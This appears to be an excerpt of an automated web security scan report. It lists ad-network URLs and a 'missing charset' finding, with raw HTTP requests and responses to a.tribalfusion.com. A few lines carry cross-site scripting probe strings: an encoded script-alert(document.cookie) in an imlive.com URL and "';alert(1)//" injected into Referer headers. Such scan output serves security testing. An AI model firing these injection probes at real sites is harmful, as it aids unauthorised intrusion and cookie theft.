http://dm.de.mookie1.com/2/B3DM/2010DM/11076249577@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11326230958@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11370845975@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11624211567@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11681620464@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11911576582@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/12119796835@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/12145795389@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/122038498@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/1682100952@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/1838084819@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/1845536281@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23
http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95
http://dm.de.mookie1.com/2/B3DM/DLX/@x94
http://events.cbs6albany.com/site_indexes/allcurrenteventslist150m0.html
http://events.cbs6albany.com/site_indexes/allcurrentmovieslist150m0.html
http://events.cbs6albany.com/site_indexes/allvenueslist150m0.html
http://events.cbs6albany.com/site_indexes/restaurantlist150m0.html
http://events.cbs6albany.com/site_indexes/theaterlist150m0.html
http://hpi.rotator.hadj7.adjuggler.net/favicon.ico
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ttj
http://imlive.com/categoryfs.asp
http://imlive.com/categoryms.asp
http://imlive.com/compliance.asp
http://imlive.com/disclaimer.asp
http://imlive.com/homepagems3.asp
http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f
http://imlive.com/liveexperts.asp
http://imlive.com/localcompanionship.asp
http://imlive.com/minglesingles.asp
http://imlive.com/pr.asp
http://imlive.com/sex_webcams_index/index.asp
http://imlive.com/sitemap.html
http://imlive.com/videosfr.asp
http://imlive.com/warningms.asp
http://jqueryui.com/about
http://jqueryui.com/themeroller/
http://main.oggifinogi.com/OggiPlayerService/PlayerProxy.aspx
http://mig.nexac.com/2/B3DM/DLX/1@x96
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3
http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3
http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]]
http://onset.freedom.com/fi/analytics/cms/
http://pixel.invitemedia.com/rubicon_sync
http://support.moxiesoft.com/
http://tags.expo9.exponential.com/favicon.ico
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl
http://voken.eyereturn.com/favicon.ico
http://widgets.mobilelocalnews.com/
http://www.moxiesoft.com/tal_products/chat.aspx
http://www.paperg.com/jsfb/embed.php
http://www.parkersoft.co.uk/favicon.ico
http://www.screenthumbs.com/favicon.ico
http://www.screenthumbs.com/inc/nshots.php
http://www.screenthumbs.com/inc/qstats.php
http://www.screenthumbs.com/tools/js/linkthumbs.js
http://www.spicefactory.org/favicon.ico

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

27.1. http://a.tribalfusion.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=arn7TwNZaiMt6memCmGwxrdUs3tYbQRKAXpu2WGR5OjVZdBuEFn93sv7X8ZalwCuq7F0QFYFP3dkBSfkBxAXNnEbfxVOGZbsNxBYCqwmLZbm12GZcXljw7f3HikS9n1bWalbfCPvRr5pHFJ2IiiqvUj8gL5UKMojsRtkyGv3iLgZdLhJWNtFwIaQqSDUhJXcolRQQftgBRpZbqFL3j1LmZaRLgOPqeE7bMdTEIGxtZdfM5WI7wWtsmYZaJOJkAibgqRMFJEdwIqaWU9WeZd8ntA03ww6cnyXOZbrqhfFE1rXFZdZb7tIQT1LDwroLnCrSBFdeNZb3ZbqSUdhKTLyZaa4ZcFGHeZbVThMfN8pnAYOeBZbsKVSfraRuvG30PErMalZa5

Response

HTTP/1.1 404 Not Found
X-Function: 409
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: keep-alive

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

27.2. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Request

GET /j.ad HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 404 Not Found
X-Function: 409
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: Close

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html

Request

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 336

<script LANGUAGE="JavaScript1.1" SRC="http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90?http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3O
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aDmNYDUArTPEj5PcrsQWUy0tFmWPjM4sJ4YbvIVmqt4Av7PmMC2Hrp0WUZcpt2w4PvT3GMgTsQdVVrkSPUyTWFWTrBP2U2nWEnvVqJdPEZbLQVbAPFupRWYiWGUT5Uymodaq0EqM2tYCQVrZc4AnZapdTpTWbdXUfkUcFXxq6enq/2401306/wrapper1.html

Request

GET /p.media/aDmNYDUArTPEj5PcrsQWUy0tFmWPjM4sJ4YbvIVmqt4Av7PmMC2Hrp0WUZcpt2w4PvT3GMgTsQdVVrkSPUyTWFWTrBP2U2nWEnvVqJdPEZbLQVbAPFupRWYiWGUT5Uymodaq0EqM2tYCQVrZc4AnZapdTpTWbdXUfkUcFXxq6enq/2401306/wrapper1.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs11ddd'%3balert(1)//e0aca46f7df/rangers/2011/01/live-chat-wednesday-at-2-pm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aFniZbdrZcAQv7qErk3wtMfZbU9XEWrMBHByiWNhZdNIKLQZbE7ZaE3B1VnZdTCA03CbU6dsgAYmGSG015YSSunPstHruMTZcelEZciG0RUMnkK5eM3IIcZaVRn0Zd5ZcseGlwZdLdJTjiNae7RFLCRUBqLtVXDfl2kgYPp2iKWvPcOdu0JWJ7oiUjYELprSghdIvVZbEJeWP7GNXnu4PSUSZafIMsjXZbr2ZctI4FCt8eQNGZa42ZcQNwxOKIw43K3QOvTZdGtFN7OVoeYFg2jEF0KYJlBdaonIUolnZbAroZaE5PT5dcvcjXPATcqSXEcqZaontQbZb575eiRLTBnHoBySsjVm8WmLhG4P1Mgmy0KZdPZdRH3aHq3CJTZaHNsd5fQFfAO8FPNKZc6E9QBBZalQ6jQqTXEgKxloEVmt7bLywrJnb5a3c45Uncdkj2b2EYQeuPrVCSlhtIOueIEhgi8qE4vZap6XlnE5XqC63dxf8eP8ZaXbaV8njVgaRWqXJXEIXVg

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 390

<IFRAME src="http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad-cache.html

Request

GET /p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad-cache.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs11ddd'%3balert(1)//e0aca46f7df/rangers/2011/01/live-chat-wednesday-at-2-pm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 220

<html>
<head>
</head>
<body>
<TABLE height="100%" cellSpacing=0 cellPadding=0 width="100%" border=0>
<tr><td height="20%"></td>
<TR>
<TD vAlign=center align=middle>

</TR>
</TABL
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad-cache.html/

Request

GET /p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad-cache.html/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 404 Not Found
X-Function: 413
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: Close

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad.html/

Request

GET /p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad.html/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad-cache.html

Request

GET /p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad-cache.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aQnfFNo0P8p8mTNj3OUZaaM0s7a0EnHEnP443sV4OxG24fZdFVF4WrXx3GaavnqGbacELgIg0cxBWwGCMCyE5R8BgUkAwwP7W4Lf15AXoGpDPEm2uWhogBbBeFtS3sNujhqcL8IypEFnMyY5rjwfdhPtkvPv5kiSYSLxx0yBZdaPvy43sI47rgYUZbuw9p7utbuxP3osZabh7jeVbmx4mSseNAqv5Zb5wZbj4QZdowyKncgsZak1kw2kFpHKqoGDFjaHdRdTSxieSPAV7ZbB4l9rNqQJyrSH6b2PjFXEWhPGO0nWtZda9fXYcnNNbuQKDH8yw2ctKVHpZdQBZaZdYNd4raNbLgQDCuZdWy59p5QQwsVvj2CCedXmmMZd7bPdbWab2pTN7L0u6KN19wCo33RHMZdXGw6lGZbUXDVkGZa6OOEfZceWieIsCwGBhZdOpj7bSZaQItcodsYVZbT2FCUiPXGvOEJWGML

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 220

<html>
<head>
</head>
<body>
<TABLE height="100%" cellSpacing=0 cellPadding=0 width="100%" border=0>
<tr><td height="20%"></td>
<TR>
<TD vAlign=center align=middle>

</TR>
</TABL
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad-cache.html/

Request

GET /p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad-cache.html/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad.html/

Request

GET /p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad.html/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aVmN7ESG7Za4mBZapdEOTtQ8YbQ6XrBjXaysSUMGWUY4VdM4mbQpPFZboYEQo5EUi4qY3nEjIYbZbgTdf1m6vZbnc7mpHUJ2qZbh3dAr3A7Gnr3HYVfW1sYV0V7OpT7R3bMWVrnGWmj5QTM4PGUMSdJx1HJxWPrN3s3U0VQuoc5ZbBE/2413746/ad-cache.html/

Request

GET /p.media/aVmN7ESG7Za4mBZapdEOTtQ8YbQ6XrBjXaysSUMGWUY4VdM4mbQpPFZboYEQo5EUi4qY3nEjIYbZbgTdf1m6vZbnc7mpHUJ2qZbh3dAr3A7Gnr3HYVfW1sYV0V7OpT7R3bMWVrnGWmj5QTM4PGUMSdJx1HJxWPrN3s3U0VQuoc5ZbBE/2413746/ad-cache.html/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
